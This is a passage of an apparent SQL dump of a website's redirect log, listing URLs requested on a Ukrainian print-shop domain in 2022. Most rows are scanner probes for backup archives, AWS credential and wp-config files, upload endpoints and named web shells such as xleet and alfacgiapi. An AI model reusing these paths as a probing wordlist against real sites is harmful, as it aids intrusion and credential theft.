11:26:49','0000-00-00 00:00:00',301),(22971,'https://ekvatorprint.com.ua/tp.tar.gz',NULL,'','',1,0,'2022-03-23 11:26:49','0000-00-00 00:00:00',301),(22972,'https://ekvatorprint.com.ua/tp.bz2',NULL,'','',1,0,'2022-03-23 11:26:49','0000-00-00 00:00:00',301),(22973,'https://ekvatorprint.com.ua/tp.rar',NULL,'','',2,0,'2022-03-23 11:26:50','0000-00-00 00:00:00',301),(22974,'https://ekvatorprint.com.ua/tp.bak',NULL,'','',1,0,'2022-03-23 11:26:50','0000-00-00 00:00:00',301),(22975,'https://ekvatorprint.com.ua/tp.zip',NULL,'','',1,0,'2022-03-23 11:26:50','0000-00-00 00:00:00',301),(22976,'https://ekvatorprint.com.ua/tp.sql.gz',NULL,'','',1,0,'2022-03-23 11:26:50','0000-00-00 00:00:00',301),(22977,'https://ekvatorprint.com.ua/tp.sql.zip',NULL,'','',1,0,'2022-03-23 11:26:51','0000-00-00 00:00:00',301),(22978,'https://ekvatorprint.com.ua/tp.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:26:51','0000-00-00 00:00:00',301),(22979,'https://ekvatorprint.com.ua/tp.sql.tar',NULL,'','',1,0,'2022-03-23 11:26:51','0000-00-00 00:00:00',301),(22980,'https://ekvatorprint.com.ua/tp.7z',NULL,'','',1,0,'2022-03-23 11:26:52','0000-00-00 00:00:00',301),(22981,'https://ekvatorprint.com.ua/tp.gz',NULL,'','',1,0,'2022-03-23 11:26:52','0000-00-00 00:00:00',301),(22982,'https://ekvatorprint.com.ua/tps.sql',NULL,'','',1,0,'2022-03-23 11:26:53','0000-00-00 00:00:00',301),(22983,'https://ekvatorprint.com.ua/tps.tar',NULL,'','',1,0,'2022-03-23 11:26:53','0000-00-00 00:00:00',301),(22984,'https://ekvatorprint.com.ua/tps.tar.gz',NULL,'','',1,0,'2022-03-23 11:26:54','0000-00-00 00:00:00',301),(22985,'https://ekvatorprint.com.ua/tps.bz2',NULL,'','',1,0,'2022-03-23 11:26:54','0000-00-00 00:00:00',301),(22986,'https://ekvatorprint.com.ua/tps.rar',NULL,'','',2,0,'2022-03-23 11:26:54','0000-00-00 00:00:00',301),(22987,'https://ekvatorprint.com.ua/tps.bak',NULL,'','',1,0,'2022-03-23 11:26:54','0000-00-00 00:00:00',301),(22988,'https://ekvatorprint.com.ua/tps.zip',NULL,'','',1,0,'2022-03-23 11:26:55','0000-00-00 00:00:00',301),(22989,'https://ekvatorprint.com.ua/tps.sql.gz',NULL,'','',1,0,'2022-03-23 11:26:55','0000-00-00 00:00:00',301),(22990,'https://ekvatorprint.com.ua/tps.sql.zip',NULL,'','',1,0,'2022-03-23 11:26:55','0000-00-00 00:00:00',301),(22991,'https://ekvatorprint.com.ua/tps.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:26:56','0000-00-00 00:00:00',301),(22992,'https://ekvatorprint.com.ua/tps.sql.tar',NULL,'','',1,0,'2022-03-23 11:26:56','0000-00-00 00:00:00',301),(22993,'https://ekvatorprint.com.ua/tps.7z',NULL,'','',1,0,'2022-03-23 11:26:56','0000-00-00 00:00:00',301),(22994,'https://ekvatorprint.com.ua/tps.gz',NULL,'','',1,0,'2022-03-23 11:26:57','0000-00-00 00:00:00',301),(22995,'https://ekvatorprint.com.ua/tt.sql',NULL,'','',1,0,'2022-03-23 11:26:57','0000-00-00 00:00:00',301),(22996,'https://ekvatorprint.com.ua/tt.tar',NULL,'','',1,0,'2022-03-23 11:26:57','0000-00-00 00:00:00',301),(22997,'https://ekvatorprint.com.ua/tt.tar.gz',NULL,'','',1,0,'2022-03-23 11:26:57','0000-00-00 00:00:00',301),(22998,'https://ekvatorprint.com.ua/tt.bz2',NULL,'','',1,0,'2022-03-23 11:26:57','0000-00-00 00:00:00',301),(22999,'https://ekvatorprint.com.ua/tt.rar',NULL,'','',2,0,'2022-03-23 11:26:58','0000-00-00 00:00:00',301),(23000,'https://ekvatorprint.com.ua/tt.bak',NULL,'','',1,0,'2022-03-23 11:26:58','0000-00-00 00:00:00',301),(23001,'https://ekvatorprint.com.ua/tt.zip',NULL,'','',1,0,'2022-03-23 11:26:58','0000-00-00 00:00:00',301),(23002,'https://ekvatorprint.com.ua/tt.sql.gz',NULL,'','',1,0,'2022-03-23 11:26:58','0000-00-00 00:00:00',301),(23003,'https://ekvatorprint.com.ua/tt.sql.zip',NULL,'','',1,0,'2022-03-23 11:26:59','0000-00-00 00:00:00',301),(23004,'https://ekvatorprint.com.ua/tt.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:26:59','0000-00-00 00:00:00',301),(23005,'https://ekvatorprint.com.ua/tt.sql.tar',NULL,'','',1,0,'2022-03-23 11:26:59','0000-00-00 00:00:00',301),(23006,'https://ekvatorprint.com.ua/tt.7z',NULL,'','',1,0,'2022-03-23 11:27:00','0000-00-00 00:00:00',301),(23007,'https://ekvatorprint.com.ua/tt.gz',NULL,'','',1,0,'2022-03-23 11:27:00','0000-00-00 00:00:00',301),(23008,'https://ekvatorprint.com.ua/ttp.sql',NULL,'','',1,0,'2022-03-23 11:27:00','0000-00-00 00:00:00',301),(23009,'https://ekvatorprint.com.ua/ttp.tar',NULL,'','',1,0,'2022-03-23 11:27:01','0000-00-00 00:00:00',301),(23010,'https://ekvatorprint.com.ua/ttp.tar.gz',NULL,'','',1,0,'2022-03-23 11:27:01','0000-00-00 00:00:00',301),(23011,'https://ekvatorprint.com.ua/ttp.bz2',NULL,'','',1,0,'2022-03-23 11:27:01','0000-00-00 00:00:00',301),(23012,'https://ekvatorprint.com.ua/ttp.rar',NULL,'','',2,0,'2022-03-23 11:27:02','0000-00-00 00:00:00',301),(23013,'https://ekvatorprint.com.ua/ttp.bak',NULL,'','',1,0,'2022-03-23 11:27:02','0000-00-00 00:00:00',301),(23014,'https://ekvatorprint.com.ua/ttp.zip',NULL,'','',1,0,'2022-03-23 11:27:02','0000-00-00 00:00:00',301),(23015,'https://ekvatorprint.com.ua/ttp.sql.gz',NULL,'','',1,0,'2022-03-23 11:27:02','0000-00-00 00:00:00',301),(23016,'https://ekvatorprint.com.ua/ttp.sql.zip',NULL,'','',1,0,'2022-03-23 11:27:03','0000-00-00 00:00:00',301),(23017,'https://ekvatorprint.com.ua/ttp.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:27:03','0000-00-00 00:00:00',301),(23018,'https://ekvatorprint.com.ua/ttp.sql.tar',NULL,'','',1,0,'2022-03-23 11:27:03','0000-00-00 00:00:00',301),(23019,'https://ekvatorprint.com.ua/ttp.7z',NULL,'','',1,0,'2022-03-23 11:27:04','0000-00-00 00:00:00',301),(23020,'https://ekvatorprint.com.ua/ttp.gz',NULL,'','',1,0,'2022-03-23 11:27:04','0000-00-00 00:00:00',301),(23021,'https://ekvatorprint.com.ua/u.sql',NULL,'','',1,0,'2022-03-23 11:27:04','0000-00-00 00:00:00',301),(23022,'https://ekvatorprint.com.ua/u.tar',NULL,'','',1,0,'2022-03-23 11:27:04','0000-00-00 00:00:00',301),(23023,'https://ekvatorprint.com.ua/u.tar.gz',NULL,'','',1,0,'2022-03-23 11:27:05','0000-00-00 00:00:00',301),(23024,'https://ekvatorprint.com.ua/u.bz2',NULL,'','',1,0,'2022-03-23 11:27:05','0000-00-00 00:00:00',301),(23025,'https://ekvatorprint.com.ua/u.rar',NULL,'','',2,0,'2022-03-23 11:27:05','0000-00-00 00:00:00',301),(23026,'https://ekvatorprint.com.ua/u.bak',NULL,'','',1,0,'2022-03-23 11:27:05','0000-00-00 00:00:00',301),(23027,'https://ekvatorprint.com.ua/u.zip',NULL,'','',1,0,'2022-03-23 11:27:06','0000-00-00 00:00:00',301),(23028,'https://ekvatorprint.com.ua/u.sql.gz',NULL,'','',1,0,'2022-03-23 11:27:06','0000-00-00 00:00:00',301),(23029,'https://ekvatorprint.com.ua/u.sql.zip',NULL,'','',1,0,'2022-03-23 11:27:06','0000-00-00 00:00:00',301),(23030,'https://ekvatorprint.com.ua/u.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:27:06','0000-00-00 00:00:00',301),(23031,'https://ekvatorprint.com.ua/u.sql.tar',NULL,'','',1,0,'2022-03-23 11:27:07','0000-00-00 00:00:00',301),(23032,'https://ekvatorprint.com.ua/u.7z',NULL,'','',1,0,'2022-03-23 11:27:07','0000-00-00 00:00:00',301),(23033,'https://ekvatorprint.com.ua/u.gz',NULL,'','',1,0,'2022-03-23 11:27:07','0000-00-00 00:00:00',301),(23034,'https://ekvatorprint.com.ua/v.sql',NULL,'','',1,0,'2022-03-23 11:27:11','0000-00-00 00:00:00',301),(23035,'https://ekvatorprint.com.ua/v.tar',NULL,'','',1,0,'2022-03-23 11:27:11','0000-00-00 00:00:00',301),(23036,'https://ekvatorprint.com.ua/v.tar.gz',NULL,'','',1,0,'2022-03-23 11:27:12','0000-00-00 00:00:00',301),(23037,'https://ekvatorprint.com.ua/v.bz2',NULL,'','',1,0,'2022-03-23 11:27:12','0000-00-00 00:00:00',301),(23038,'https://ekvatorprint.com.ua/v.rar',NULL,'','',2,0,'2022-03-23 11:27:12','0000-00-00 00:00:00',301),(23039,'https://ekvatorprint.com.ua/v.bak',NULL,'','',1,0,'2022-03-23 11:27:12','0000-00-00 00:00:00',301),(23040,'https://ekvatorprint.com.ua/v.zip',NULL,'','',1,0,'2022-03-23 11:27:13','0000-00-00 00:00:00',301),(23041,'https://ekvatorprint.com.ua/v.sql.gz',NULL,'','',1,0,'2022-03-23 11:27:13','0000-00-00 00:00:00',301),(23042,'https://ekvatorprint.com.ua/v.sql.zip',NULL,'','',1,0,'2022-03-23 11:27:13','0000-00-00 00:00:00',301),(23043,'https://ekvatorprint.com.ua/v.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:27:13','0000-00-00 00:00:00',301),(23044,'https://ekvatorprint.com.ua/v.sql.tar',NULL,'','',1,0,'2022-03-23 11:27:14','0000-00-00 00:00:00',301),(23045,'https://ekvatorprint.com.ua/v.7z',NULL,'','',1,0,'2022-03-23 11:27:14','0000-00-00 00:00:00',301),(23046,'https://ekvatorprint.com.ua/v.gz',NULL,'','',1,0,'2022-03-23 11:27:14','0000-00-00 00:00:00',301),(23047,'https://ekvatorprint.com.ua/va.sql',NULL,'','',1,0,'2022-03-23 11:27:15','0000-00-00 00:00:00',301),(23048,'https://ekvatorprint.com.ua/va.tar',NULL,'','',1,0,'2022-03-23 11:27:15','0000-00-00 00:00:00',301),(23049,'https://ekvatorprint.com.ua/va.tar.gz',NULL,'','',1,0,'2022-03-23 11:27:15','0000-00-00 00:00:00',301),(23050,'https://ekvatorprint.com.ua/va.bz2',NULL,'','',1,0,'2022-03-23 11:27:15','0000-00-00 00:00:00',301),(23051,'https://ekvatorprint.com.ua/va.rar',NULL,'','',2,0,'2022-03-23 11:27:16','0000-00-00 00:00:00',301),(23052,'https://ekvatorprint.com.ua/va.bak',NULL,'','',1,0,'2022-03-23 11:27:16','0000-00-00 00:00:00',301),(23053,'https://ekvatorprint.com.ua/va.zip',NULL,'','',1,0,'2022-03-23 11:27:16','0000-00-00 00:00:00',301),(23054,'https://ekvatorprint.com.ua/va.sql.gz',NULL,'','',1,0,'2022-03-23 11:27:16','0000-00-00 00:00:00',301),(23055,'https://ekvatorprint.com.ua/va.sql.zip',NULL,'','',1,0,'2022-03-23 11:27:17','0000-00-00 00:00:00',301),(23056,'https://ekvatorprint.com.ua/va.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:27:17','0000-00-00 00:00:00',301),(23057,'https://ekvatorprint.com.ua/va.sql.tar',NULL,'','',1,0,'2022-03-23 11:27:17','0000-00-00 00:00:00',301),(23058,'https://ekvatorprint.com.ua/va.7z',NULL,'','',1,0,'2022-03-23 11:27:18','0000-00-00 00:00:00',301),(23059,'https://ekvatorprint.com.ua/va.gz',NULL,'','',1,0,'2022-03-23 11:27:18','0000-00-00 00:00:00',301),(23060,'https://ekvatorprint.com.ua/vat.sql',NULL,'','',1,0,'2022-03-23 11:27:18','0000-00-00 00:00:00',301),(23061,'https://ekvatorprint.com.ua/vat.tar',NULL,'','',1,0,'2022-03-23 11:27:18','0000-00-00 00:00:00',301),(23062,'https://ekvatorprint.com.ua/vat.tar.gz',NULL,'','',1,0,'2022-03-23 11:27:19','0000-00-00 00:00:00',301),(23063,'https://ekvatorprint.com.ua/vat.bz2',NULL,'','',1,0,'2022-03-23 11:27:19','0000-00-00 00:00:00',301),(23064,'https://ekvatorprint.com.ua/vat.rar',NULL,'','',2,0,'2022-03-23 11:27:19','0000-00-00 00:00:00',301),(23065,'https://ekvatorprint.com.ua/vat.bak',NULL,'','',1,0,'2022-03-23 11:27:20','0000-00-00 00:00:00',301),(23066,'https://ekvatorprint.com.ua/vat.zip',NULL,'','',1,0,'2022-03-23 11:27:20','0000-00-00 00:00:00',301),(23067,'https://ekvatorprint.com.ua/vat.sql.gz',NULL,'','',1,0,'2022-03-23 11:27:20','0000-00-00 00:00:00',301),(23068,'https://ekvatorprint.com.ua/vat.sql.zip',NULL,'','',1,0,'2022-03-23 11:27:20','0000-00-00 00:00:00',301),(23069,'https://ekvatorprint.com.ua/vat.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:27:21','0000-00-00 00:00:00',301),(23070,'https://ekvatorprint.com.ua/vat.sql.tar',NULL,'','',1,0,'2022-03-23 11:27:21','0000-00-00 00:00:00',301),(23071,'https://ekvatorprint.com.ua/vat.7z',NULL,'','',1,0,'2022-03-23 11:27:21','0000-00-00 00:00:00',301),(23072,'https://ekvatorprint.com.ua/vat.gz',NULL,'','',1,0,'2022-03-23 11:27:22','0000-00-00 00:00:00',301),(23073,'https://ekvatorprint.com.ua/ffaa531.php',NULL,'','',5,0,'2022-03-23 16:52:29','0000-00-00 00:00:00',301),(23074,'https://ekvatorprint.com.ua/foxwsov1.2.php',NULL,'','',1,0,'2022-03-23 16:52:29','0000-00-00 00:00:00',301),(23075,'https://ekvatorprint.com.ua/auto-seo.php',NULL,'','',1,0,'2022-03-23 16:52:30','0000-00-00 00:00:00',301),(23076,'https://ekvatorprint.com.ua/wp-2019.php',NULL,'','',11,0,'2022-03-23 16:52:30','0000-00-00 00:00:00',301),(23077,'https://ekvatorprint.com.ua/wp-fox.php',NULL,'','',2,0,'2022-03-23 16:52:30','0000-00-00 00:00:00',301),(23078,'https://ekvatorprint.com.ua/xx.php',NULL,'','',7,0,'2022-03-23 16:52:30','0000-00-00 00:00:00',301),(23079,'https://ekvatorprint.com.ua/wp-admin/sistem.php',NULL,'','',3,0,'2022-03-23 19:26:37','0000-00-00 00:00:00',301),(23080,'https://ekvatorprint.com.ua/wp-includes/sistem.php',NULL,'','',3,0,'2022-03-23 21:55:12','0000-00-00 00:00:00',301),(23081,'https://ekvatorprint.com.ua/templates/gk_ilife/css/suckerfish.css\" rel=\"stylesheet\"  type=\"text/css\"',NULL,'','',1,0,'2022-03-24 21:41:33','0000-00-00 00:00:00',301),(23082,'https://ekvatorprint.com.ua/media/plg_content_mavikthumbnails/slimbox2/css/slimbox2.css\" rel=\"stylesheet\" type=\"text/css\"',NULL,'','',1,0,'2022-03-24 21:41:33','0000-00-00 00:00:00',301),(23083,'https://ekvatorprint.com.ua/templates/gk_ilife/css/ie6_css.css\" rel=\"stylesheet\" type=\"text/css\"',NULL,'','',1,0,'2022-03-24 21:41:40','0000-00-00 00:00:00',301),(23084,'https://ekvatorprint.com.ua/templates/gk_ilife/css/ie7_css.css\" rel=\"stylesheet\" type=\"text/css\"',NULL,'','',1,0,'2022-03-24 21:41:40','0000-00-00 00:00:00',301),(23085,'https://ekvatorprint.com.ua/aws/.credentials',NULL,'','',1,0,'2022-03-25 08:04:31','0000-00-00 00:00:00',301),(23086,'https://ekvatorprint.com.ua/wp-content/alfa_data/alfacgiapi/perl.alfa',NULL,'www.google.com','',2,0,'2022-03-25 19:18:54','0000-00-00 00:00:00',301),(23087,'https://ekvatorprint.com.ua/wp-content/alfacgiapi/perl.alfa',NULL,'www.google.com','',5,0,'2022-03-25 19:18:55','0000-00-00 00:00:00',301),(23088,'https://ekvatorprint.com.ua/wp-content/sistem.php',NULL,'','',3,0,'2022-03-25 23:47:52','0000-00-00 00:00:00',301),(23089,'https://ekvatorprint.com.ua/.aws/.env',NULL,'','',1,0,'2022-03-26 08:02:55','0000-00-00 00:00:00',301),(23090,'https://ekvatorprint.com.ua/3e8ccf1ad5a23496c891787fb3bd5567',NULL,'https://ekvatorprint.com.ua/?r=%27','',152,0,'2022-03-26 11:12:03','0000-00-00 00:00:00',301),(23091,'https://ekvatorprint.com.ua/wp-includes/shell20211028.php',NULL,'','',8,0,'2022-03-26 22:47:29','0000-00-00 00:00:00',301),(23092,'https://ekvatorprint.com.ua/assets/colors/accesson.php',NULL,'','',2,0,'2022-03-28 08:44:05','0000-00-00 00:00:00',301),(23093,'https://ekvatorprint.com.ua/ckeditor/connectors/php/connector.php',NULL,'','',1,0,'2022-03-28 10:14:15','0000-00-00 00:00:00',301),(23094,'https://ekvatorprint.com.ua/yjame4mnvio8fun0phgwccahvqf',NULL,'','',1,0,'2022-03-28 15:06:50','0000-00-00 00:00:00',301),(23095,'https://ekvatorprint.com.ua/admin/filemanager/dialog.php',NULL,'','',1,0,'2022-03-28 23:43:45','0000-00-00 00:00:00',301),(23096,'https://ekvatorprint.com.ua/media/plg_jchoptimize/cache/js/d2fa37f0570c0691d987852a622596e2.js',NULL,'','',2,0,'2022-03-29 08:57:30','0000-00-00 00:00:00',301),(23097,'https://ekvatorprint.com.ua/sys-cache/index.php',NULL,'','',3,0,'2022-03-29 09:22:17','0000-00-00 00:00:00',301),(23098,'https://ekvatorprint.com.ua/assets/backend/plugins/plupload/examples/upload.php',NULL,'','',1,0,'2022-03-30 15:20:04','0000-00-00 00:00:00',301),(23099,'https://ekvatorprint.com.ua/wordpress/license.txt',NULL,'http://ekvatorprint.com.ua/wordpress/license.txt','',2,0,'2022-03-30 16:16:30','0000-00-00 00:00:00',301),(23100,'https://ekvatorprint.com.ua/wp-content/plugins/yandex-money-checkout/assets/js/yandex-checkout-admin.js',NULL,'','',1,0,'2022-03-30 20:36:53','0000-00-00 00:00:00',301),(23101,'https://ekvatorprint.com.ua/public/assets/plugins/plupload/examples/upload.php',NULL,'','',1,0,'2022-03-31 08:09:35','0000-00-00 00:00:00',301),(23102,'https://ekvatorprint.com.ua/wp-config.php.6',NULL,'','',1,0,'2022-03-31 21:17:35','0000-00-00 00:00:00',301),(23103,'https://ekvatorprint.com.ua/wp-config.php.7',NULL,'','',1,0,'2022-03-31 21:17:35','0000-00-00 00:00:00',301),(23104,'https://ekvatorprint.com.ua/wp-config.php.9',NULL,'','',1,0,'2022-03-31 21:17:36','0000-00-00 00:00:00',301),(23105,'https://ekvatorprint.com.ua/wp-config.php.a',NULL,'','',1,0,'2022-03-31 21:17:37','0000-00-00 00:00:00',301),(23106,'https://ekvatorprint.com.ua/wp/license.txt',NULL,'http://ekvatorprint.com.ua/wp/license.txt','',2,0,'2022-04-01 13:02:39','0000-00-00 00:00:00',301),(23107,'https://ekvatorprint.com.ua/aws/config',NULL,'','',1,0,'2022-04-01 15:44:35','0000-00-00 00:00:00',301),(23108,'https://ekvatorprint.com.ua/admin/assets/plugins/plupload/examples/upload.php',NULL,'','',1,0,'2022-04-02 04:54:34','0000-00-00 00:00:00',301),(23109,'https://ekvatorprint.com.ua/wp-content/plugins/yookassa/assets/js/yookassa-admin.js',NULL,'','',2,0,'2022-04-02 23:34:53','0000-00-00 00:00:00',301),(23110,'https://ekvatorprint.com.ua/temp/license.txt',NULL,'http://ekvatorprint.com.ua/temp/license.txt','',3,0,'2022-04-03 23:03:41','0000-00-00 00:00:00',301),(23111,'https://ekvatorprint.com.ua/assets/admin/plugins/plupload/examples/upload.php',NULL,'','',1,0,'2022-04-04 03:28:42','0000-00-00 00:00:00',301),(23112,'https://ekvatorprint.com.ua/wikindex.php',NULL,'','',16,0,'2022-04-04 11:40:04','0000-00-00 00:00:00',301),(23113,'https://ekvatorprint.com.ua/xleet-shell.php',NULL,'','',5,0,'2022-04-04 17:38:58','0000-00-00 00:00:00',301),(23114,'https://ekvatorprint.com.ua/sh3llx.php',NULL,'','',2,0,'2022-04-04 17:38:58','0000-00-00 00:00:00',301),(23115,'https://ekvatorprint.com.ua/jindex.php',NULL,'','',6,0,'2022-04-04 17:38:59','0000-00-00 00:00:00',301),(23116,'https://ekvatorprint.com.ua/xleet.php',NULL,'','',29,0,'2022-04-04 17:38:59','0000-00-00 00:00:00',301),(23117,'https://ekvatorprint.com.ua/takeout.php',NULL,'','',2,0,'2022-04-04 17:38:59','0000-00-00 00:00:00',301),(23118,'https://ekvatorprint.com.ua/xlet.php',NULL,'','',2,0,'2022-04-04 17:38:59','0000-00-00 00:00:00',301),(23119,'https://ekvatorprint.com.ua/yiuc4e9w3kkehobxhd',NULL,'','',1,0,'2022-04-04 20:08:55','0000-00-00 00:00:00',301),(23120,'https://ekvatorprint.com.ua/file-uploader/server/php/index.php?file=tx2rghf.jpg',NULL,'','',1,0,'2022-04-05 12:44:22','0000-00-00 00:00:00',301),(23121,'https://ekvatorprint.com.ua/simple.php',NULL,'','',4,0,'2022-04-06 06:21:07','0000-00-00 00:00:00',301),(23122,'https://ekvatorprint.com.ua/assets/images/get.php',NULL,'','',4,0,'2022-04-06 11:42:14','0000-00-00 00:00:00',301),(23123,'https://ekvatorprint.com.ua/assets/colors/go.php',NULL,'','',3,0,'2022-04-06 12:59:21','0000-00-00 00:00:00',301),(23124,'https://ekvatorprint.com.ua/assets/colors/get.php',NULL,'','',3,0,'2022-04-06 13:00:15','0000-00-00 00:00:00',301),(23125,'https://ekvatorprint.com.ua/assets/images/go.php',NULL,'','',4,0,'2022-04-06 13:09:25','0000-00-00 00:00:00',301),(23126,'https://ekvatorprint.com.ua/1/license.txt',NULL,'http://ekvatorprint.com.ua/1/license.txt','',2,0,'2022-04-06 14:37:46','0000-00-00 00:00:00',301),(23127,'https://ekvatorprint.com.ua/cpanel',NULL,'','',2,0,'2022-04-06 18:14:50','0000-00-00 00:00:00',301),(23128,'https://ekvatorprint.com.ua/assets/file-uploader/server/php/index.php?file=tx2rghf.jpg',NULL,'','',1,0,'2022-04-07 07:55:57','0000-00-00 00:00:00',301),(23129,'https://ekvatorprint.com.ua/public/_ignition/health-check/',NULL,'http://ekvatorprint.com.ua/public/_ignition/health-check/','',5,0,'2022-04-07 21:54:58','0000-00-00 00:00:00',301),(23130,'https://ekvatorprint.com.ua/wp-content/export.php',NULL,'www.bing.com','',17,0,'2022-04-08 00:26:22','0000-00-00 00:00:00',301),(23131,'https://ekvatorprint.com.ua/assets/plugins/file-uploader/server/php/index.php?file=tx2rghf.jpg',NULL,'','',1,0,'2022-04-09 04:05:19','0000-00-00 00:00:00',301),(23132,'https://ekvatorprint.com.ua/123/license.txt',NULL,'http://ekvatorprint.com.ua/123/license.txt','',4,0,'2022-04-09 09:22:28','0000-00-00 00:00:00',301),(23133,'https://ekvatorprint.com.ua/_aws/credentials',NULL,'','',1,0,'2022-04-09 10:51:09','0000-00-00 00:00:00',301),(23134,'https://ekvatorprint.com.ua/js/_system/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-04-09 12:17:07','0000-00-00 00:00:00',301),(23135,'https://ekvatorprint.com.ua/leafmailer2.8.php',NULL,'','',3,0,'2022-04-09 14:44:00','0000-00-00 00:00:00',301),(23136,'https://ekvatorprint.com.ua/leaf.php',NULL,'','',6,0,'2022-04-09 14:44:10','0000-00-00 00:00:00',301),(23137,'https://ekvatorprint.com.ua/wp-load.php',NULL,'www.bing.com','',20,0,'2022-04-10 13:43:56','0000-00-00 00:00:00',301),(23138,'https://ekvatorprint.com.ua/wp-admin/style.php',NULL,'www.bing.com','',15,0,'2022-04-10 13:44:14','0000-00-00 00:00:00',301),(23139,'https://ekvatorprint.com.ua/radio.php',NULL,'www.bing.com','',29,0,'2022-04-10 13:45:13','0000-00-00 00:00:00',301),(23140,'https://ekvatorprint.com.ua/wp-signin.php?dizo&ping',NULL,'www.bing.com','',8,0,'2022-04-10 13:45:57','0000-00-00 00:00:00',301),(23141,'https://ekvatorprint.com.ua/export.php',NULL,'www.bing.com','',15,0,'2022-04-10 13:46:14','0000-00-00 00:00:00',301),(23142,'https://ekvatorprint.com.ua/wp-includes/wp-class.php',NULL,'www.bing.com','',25,0,'2022-04-10 13:46:32','0000-00-00 00:00:00',301),(23143,'https://ekvatorprint.com.ua/wp-includes/images/css.php',NULL,'www.bing.com','',16,0,'2022-04-10 13:46:50','0000-00-00 00:00:00',301),(23144,'https://ekvatorprint.com.ua/defau1t.php',NULL,'www.bing.com','',21,0,'2022-04-10 13:47:09','0000-00-00 00:00:00',301),(23145,'https://ekvatorprint.com.ua/archives.php',NULL,'www.bing.com','',15,0,'2022-04-10 13:48:49','0000-00-00 00:00:00',301),(23146,'https://ekvatorprint.com.ua/defau11.php',NULL,'www.bing.com','',18,0,'2022-04-10 13:48:59','0000-00-00 00:00:00',301),(23147,'https://ekvatorprint.com.ua/wp-content/outcms.php?up',NULL,'www.bing.com','',15,0,'2022-04-10 13:49:06','0000-00-00 00:00:00',301),(23148,'https://ekvatorprint.com.ua/system_log.php?bala=up',NULL,'www.bing.com','',15,0,'2022-04-10 13:49:21','0000-00-00 00:00:00',301),(23149,'https://ekvatorprint.com.ua/wp-backup-sql-302.php',NULL,'www.bing.com','',15,0,'2022-04-10 13:49:32','0000-00-00 00:00:00',301),(23150,'https://ekvatorprint.com.ua/alfa_data',NULL,'www.bing.com','',15,0,'2022-04-10 13:49:54','0000-00-00 00:00:00',301),(23151,'https://ekvatorprint.com.ua/alfacgiapi',NULL,'www.bing.com','',15,0,'2022-04-10 13:50:04','0000-00-00 00:00:00',301),(23152,'https://ekvatorprint.com.ua/cgialfa',NULL,'www.bing.com','',15,0,'2022-04-10 13:50:14','0000-00-00 00:00:00',301),(23153,'https://ekvatorprint.com.ua/wp-content/uploads/alfa_data',NULL,'www.bing.com','',15,0,'2022-04-10 13:50:53','0000-00-00 00:00:00',301),(23154,'https://ekvatorprint.com.ua/wp-content/uploads/alfacgiapi',NULL,'www.bing.com','',14,0,'2022-04-10 13:51:07','0000-00-00 00:00:00',301),(23155,'https://ekvatorprint.com.ua/wp-content/uploads/cgialfa',NULL,'www.bing.com','',15,0,'2022-04-10 13:51:15','0000-00-00 00:00:00',301),(23156,'https://ekvatorprint.com.ua/wp-includes/alfa_data',NULL,'www.bing.com','',15,0,'2022-04-10 13:51:24','0000-00-00 00:00:00',301),(23157,'https://ekvatorprint.com.ua/wp-includes/alfacgiapi',NULL,'www.bing.com','',15,0,'2022-04-10 13:51:34','0000-00-00 00:00:00',301),(23158,'https://ekvatorprint.com.ua/wp-includes/cgialfa',NULL,'www.bing.com','',14,0,'2022-04-10 13:51:41','0000-00-00 00:00:00',301),(23159,'https://ekvatorprint.com.ua/wp-admin/alfa_data',NULL,'www.bing.com','',15,0,'2022-04-10 13:51:53','0000-00-00 00:00:00',301),(23160,'https://ekvatorprint.com.ua/wp-admin/alfacgiapi',NULL,'www.bing.com','',14,0,'2022-04-10 13:52:01','0000-00-00 00:00:00',301),(23161,'https://ekvatorprint.com.ua/wp-admin/cgialfa',NULL,'www.bing.com','',15,0,'2022-04-10 13:52:14','0000-00-00 00:00:00',301),(23162,'https://ekvatorprint.com.ua/wp-content/alfa_data',NULL,'www.bing.com','',15,0,'2022-04-10 13:52:24','0000-00-00 00:00:00',301),(23163,'https://ekvatorprint.com.ua/wp-content/alfacgiapi',NULL,'www.bing.com','',15,0,'2022-04-10 13:52:33','0000-00-00 00:00:00',301),(23164,'https://ekvatorprint.com.ua/wp-content/cgialfa',NULL,'www.bing.com','',15,0,'2022-04-10 13:52:41','0000-00-00 00:00:00',301),(23165,'https://ekvatorprint.com.ua/templates/beez3/alfa_data',NULL,'www.bing.com','',15,0,'2022-04-10 13:52:49','0000-00-00 00:00:00',301),(23166,'https://ekvatorprint.com.ua/templates/beez3/alfacgiapi',NULL,'www.bing.com','',15,0,'2022-04-10 13:52:58','0000-00-00 00:00:00',301),(23167,'https://ekvatorprint.com.ua/templates/beez3/cgialfa',NULL,'www.bing.com','',15,0,'2022-04-10 13:53:15','0000-00-00 00:00:00',301),(23168,'https://ekvatorprint.com.ua/sites/default/files/alfa_data',NULL,'www.bing.com','',15,0,'2022-04-10 13:53:22','0000-00-00 00:00:00',301),(23169,'https://ekvatorprint.com.ua/sites/default/files/alfacgiapi',NULL,'www.bing.com','',15,0,'2022-04-10 13:53:31','0000-00-00 00:00:00',301),(23170,'https://ekvatorprint.com.ua/sites/default/files/cgialfa',NULL,'www.bing.com','',15,0,'2022-04-10 13:53:36','0000-00-00 00:00:00',301),(23171,'https://ekvatorprint.com.ua/admin/controller/extension/extension/alfa_data',NULL,'www.bing.com','',15,0,'2022-04-10 13:53:44','0000-00-00 00:00:00',301),(23172,'https://ekvatorprint.com.ua/admin/controller/extension/extension/alfacgiapi',NULL,'www.bing.com','',15,0,'2022-04-10 13:53:50','0000-00-00 00:00:00',301),(23173,'https://ekvatorprint.com.ua/admin/controller/extension/extension/cgialfa',NULL,'www.bing.com','',15,0,'2022-04-10 13:53:57','0000-00-00 00:00:00',301),(23174,'https://ekvatorprint.com.ua/debug/default/view?panel=config',NULL,'','',4,0,'2022-04-10 23:04:04','0000-00-00 00:00:00',301),(23175,'https://ekvatorprint.com.ua/assets/plugins/fileuploader/examples/one-button/php/form_upload.php',NULL,'','',1,0,'2022-04-11 02:42:43','0000-00-00 00:00:00',301),(23176,'https://ekvatorprint.com.ua/defaul1.php',NULL,'www.google.com','',20,0,'2022-04-11 21:43:06','0000-00-00 